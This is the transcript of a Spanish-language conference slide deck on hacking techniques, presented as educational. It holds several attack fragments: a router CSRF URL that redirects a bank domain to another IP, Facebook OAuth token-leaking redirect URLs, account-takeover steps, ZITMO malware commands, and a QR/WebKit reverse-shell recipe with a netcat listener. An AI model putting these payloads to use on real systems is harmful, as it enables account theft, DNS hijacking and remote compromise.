ninja hacking

99
Ninja~Hacking Ninja~Hacking VII Congreso de Ciencias Exactas VII Congreso de Ciencias Exactas Rafael Bucio. Rafael Bucio. [email protected] @Bucio

Upload: rafael-bucio

Post on 26-May-2015

316 views

Category:

Internet


0 download

DESCRIPTION

Conferencia Impartida en la Universidad Autónoma de Aguascalientes. Los ejemplos mostrados, fueron parchados en su tiempo. Platica informal. {mix/page=Jugando al Espía)

TRANSCRIPT

Page 1: Ninja hacking

Ninja~HackingNinja~HackingVII Congreso de Ciencias ExactasVII Congreso de Ciencias Exactas

Rafael Bucio.Rafael [email protected]@Bucio

Page 2: Ninja hacking

Esta platica es...Con fines educativos.

Page 3: Ninja hacking

✔ Cultura ✔ Samurai & Ninja Ninjutsu 忍術✔ Estrategia / formas de engaño (Bo Ryaku)

✔ Suplantación e Infiltración (Inton Jutsu)

✔ Ocultación y Camuflaje (Shinobi Iri)

✔ Espionaje (Cho Ho)

✔ Stuff

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

Page 4: Ninja hacking

✔ Cultura

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

Page 5: Ninja hacking

HACKER:

En el mundo de la informática, un hacker es una persona que entra de forma no autorizada a computadoras y redes de computadoras. Su motivación varía de acuerdo a su ideología: fines de lucro, como una forma de protesta o simplemente por la satisfacción de lograrlo.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Cultura.~$ Cultura.

Page 6: Ninja hacking

WHITE HAT BLACK HAT

CrackerPhreakerCarder

Lammer Script-kiddieNewbie (n00b)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Cultura.~$ Cultura.

Page 7: Ninja hacking

✔ Samurai & Ninja

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

Page 8: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Samurai & Ninja.~$ Samurai & Ninja.

Page 9: Ninja hacking

✔ Estrategia / formas de engaño(Bo Ryaku)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

Page 10: Ninja hacking

Fin común:

✔Obtener Información / Obstruir información

Escenarios:

✔Internet✔Redes Locales

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

Page 11: Ninja hacking

Escenario: Internet

Tácticas:

✔Injection *SQL✔Auth, Session Management✔XSS✔Sensitive Data Exposure✔Using Components with Known Vulnerabilities

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

Page 12: Ninja hacking

Escenario: Locales

Tácticas:

✔ Sniffing✔ DNS Poisoning/modem✔ MITM ~ (man-in-the-middle)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

Page 13: Ninja hacking

¿Ingeniería Social?

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

Page 14: Ninja hacking

QR con Premio

Page 15: Ninja hacking

Es el uso de influencia y persuasión sobre una(s) persona(s) para engañarla(s) y obtener información

confidencial o sensible para fines maliciosos!

Page 16: Ninja hacking

Ingeniería social básica. #win

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

Page 17: Ninja hacking

Ingeniería social a jaquers. #EPICwin

Page 18: Ninja hacking
Page 19: Ninja hacking

✔ Suplantación e Infiltración (Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

Page 20: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Escenarios:

➔Internet

Page 21: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Escenarios:

➔Internet

Paginas Web.Redes Sociales.

Page 22: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Fin común / TARGET* | Obtener Acceso completo al servidor

Ejemplo: Secretaria de Gobierno Quintana Roo 2005/2011

/*Tiempo 20 min*/

Page 23: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 24: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 25: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 26: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

http://segob.qroo.gob.mx/

Page 27: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 28: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 29: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 30: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 31: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 32: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 33: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 34: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 35: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 36: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Kernel -> exploit -> root Backdoor ( /tmp -> Escuchar obtener Root)

Page 37: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 38: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 39: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 40: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Injection SQL

Es una vulnerabilidad de las Web, que afectan directamente a las bases de datos de una aplicación, El problema radica al filtrar erróneamente las variables utilizadas en parte de la

página con código SQL.

Page 41: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 42: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 43: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 44: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 45: Ninja hacking

✔ Ocultación y Camuflaje (Shinobi Iri)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

Page 46: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Escenarios:

➔Redes Locales

Page 47: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Escenarios:

➔Redes Locales

✔ Sniffing.

✔ Phishing.

✔ Pharming.

✔ Robo de identidad.

✗Jugar al espia.. con tú novi@.

Page 48: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Page 49: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Cross Site Request ForgeryModifica la configuración del dispositivo usando una petición GET

http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95

Page 50: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Page 51: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Escenarios:

➔Redes Locales

El caso de el jefe de seguridad en Facebok:

“Los empleados que lograron hackear al ingeniero de SRE (Site Reliability Engineering) se ubicaron sigilosamente cerca de su domicilio particular, y conectaron un router inalámbrico que se identificó con el mismo SSID de la red casera de la víctima.”

Page 52: Ninja hacking

✔ Espionaje(Cho Ho)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

Page 53: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 54: Ninja hacking

OBTNER INFORMACIÓN.

Facebook OAuth

(the bug is closed now.)12.marzo.2013

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 55: Ninja hacking

redirect_ur i= http://www.touch.facebook.com/#/x/#/l.php?u=http://facebook.com/l.php?u=BAD_URL&h=3AQHlSR7f

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 56: Ninja hacking

http://touch.facebook.com/l.php?u=http://facebook.com/l.php?u=BAD_URL&h=3AQHlSR7f/#access_token=ACCESS TOKEN

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 57: Ninja hacking

Facebook OAuth bug (xd_arbiter.php)

12.ABRIL.2013this bug was closed by Facebook Security Team

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 58: Ninja hacking

http://static.ak.facebook.com/connect/xd_arbiter.php?version=21#channel=f876ddf24&origin=http://localhost&chan

nel_path=/oauth/PoC_js/?fb_xd_fragment#xd_sig=f3adf0e04c&” 

 → https://developers.facebook.com/docs/reference/javascript/   

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 59: Ninja hacking

http://facebook.com/connect/xd_arbiter.php?#&origin=http://facebook.com/&#8221   

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 60: Ninja hacking

http://facebook.com/connect/xd_arbiter.php?#!/l.php?u=http://facebook.com/l.php?

u=http://localhost/oauth/boom.php?&h=WAQGoSQT6&origin=http://facebook.com/

VER VIDEOpwn_fb_2.ogv.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 61: Ninja hacking

http://touch.facebook.com/connect/xd_arbiter.php?

#!/apps/APPmalvada/?&origin=http:// facebook.com/

Da e l t o ke n y p e rm i s os d e c ua l q u i e r c u enta en fac ebo o k q u e d e c l i c k .

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 62: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 63: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

$12,500 USD

Page 64: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

$20,000 USD

Page 65: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

1)Cambiar Value por el profile_id de la victima. 2)Enviar F al 32665 y recibes un codigo de 8 caracters.3)Ingresas el codigo pwn pwn

Page 66: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 67: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 68: Ninja hacking

Android como herramienta para espiar.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 69: Ninja hacking

Proyecto off.http://works.bucio.com.mx/apk/ds.apk

VIDEOds.ogg

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 70: Ninja hacking
Page 71: Ninja hacking
Page 72: Ninja hacking

Botnets zitmozitmo

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 73: Ninja hacking

Controlar el dispositivo a través de mensajes de texto permite a los cibercriminales vulnerar los sistemas de doble autenticación de una manera sencilla. Manteniéndose ocultos en dentro de los sistemas del usuario, ya sea en los equipos de escritorio o los dispositivos móviles logran realizar las transferencias bancarias de una manera sigilosa y sin alertar al usuario.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 74: Ninja hacking

#: Es el comando inicial que le permite al atacante conocer si el dispositivo está infectado o no.

/: Permite definir a qué número de teléfono se van a enviar los mensajes que reciba el dispositivo de la víctima.

!: Desactiva y deshabilita la ejecución de ZITMO en el teléfono con Android.

,: Finaliza la secuencia de comandos y vuelve a activar la recepción de mensajes en el dispositivo móvil de la víctima.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Page 75: Ninja hacking

Ejemplo.

HELLCELHELLCEL

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Page 76: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Sniffing

Page 77: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Sniffing

Page 78: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Page 79: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Page 80: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Page 81: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Page 82: Ninja hacking

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Page 83: Ninja hacking
Page 84: Ninja hacking

"Dios mío, Apple me ha expulsado del desarrollo del programa de iOS,

¡qué grosero!" Charlie Miller

Page 85: Ninja hacking

El desarrollador había creado una aplicación de seguimiento de valores bursátiles llamado IntaStock.

Esta app incluía en sus códigos un malware que permitía al hacker (en este caso, el

mismo Charlie Miller) descargar información de los terminales, tales como fotografías, datos y contactos.

V i d eo i p h o ne . o g v

Page 86: Ninja hacking

The Jester Style.

RECETA:

*QR-CODE *URL [host]

*JS-ENCODER*netcat http://scriptasylum.com/tutorials/encode-decode.html

Page 87: Ninja hacking

QR-Codes <- android o IOS 99%

UTF JS codificado dentro del HTML

PAGINA.HTML shellcode executed→

Page 88: Ninja hacking

Remote Code Execution CVE-2010-1807,

Page 89: Ninja hacking

QR-Codes android o IOS 99%←→

UTF JS codificado dentro del HTML

PAGINA.HTML → shellcode executed

WebKit[dispositivo] → Reverse TCP shell connection to a ‘remote server’ port 37337

Page 90: Ninja hacking
Page 91: Ninja hacking
Page 92: Ninja hacking

nc -v -l -p 37337 ....

Page 93: Ninja hacking
Page 94: Ninja hacking

ZoAuthoAuth

Page 95: Ninja hacking
Page 96: Ninja hacking

$> stuff.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Stuff~$ Stuff

Page 97: Ninja hacking

Certified Cyber Security Ninja (CCSN)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Stuff~$ Stuff

Page 98: Ninja hacking

6r4c145

Page 99: Ninja hacking

IM: IM: [email protected]@bucio.com.mx

Twitter: @BucioTwitter: @Bucio